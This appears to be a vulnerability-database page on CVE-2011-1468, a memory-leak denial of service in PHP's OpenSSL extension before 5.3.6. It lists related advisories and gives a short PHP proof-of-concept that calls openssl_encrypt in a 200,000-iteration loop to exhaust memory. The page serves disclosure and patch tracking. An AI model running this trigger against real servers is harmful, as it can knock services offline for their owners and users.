PHP "OpenSSL" extension multiple denial of service vulnerabilitie
Reporter | Title | Published | Views | Family All 65 |
---|---|---|---|---|
Veracode | Denial Of Service (DoS) | 10 Apr 202001:03 | – | veracode |
Exploit DB | PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service | 8 Mar 201100:00 | – | exploitdb |
Exploit DB | PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service | 8 Mar 201100:00 | – | exploitdb |
UbuntuCve | CVE-2011-1468 | 19 Mar 201100:00 | – | ubuntucve |
CVE | CVE-2011-1468 | 20 Mar 201102:00 | – | cve |
Cvelist | CVE-2011-1468 | 20 Mar 201101:00 | – | cvelist |
Prion | Design/Logic Flaw | 20 Mar 201102:00 | – | prion |
NVD | CVE-2011-1468 | 20 Mar 201102:00 | – | nvd |
Tenable Nessus | RHEL 5 / 6 : php53 and php (RHSA-2011:1423) | 3 Nov 201100:00 | – | nessus |
Tenable Nessus | Scientific Linux Security Update : php53 and php on SL5.x, SL6.x i386/x86_64 | 1 Aug 201200:00 | – | nessus |
<?php
$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";
$maxi = 200000;
$t = microtime(1);
for ($i=0;$i<$maxi; $i++){
openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(1)-$t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";
?>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo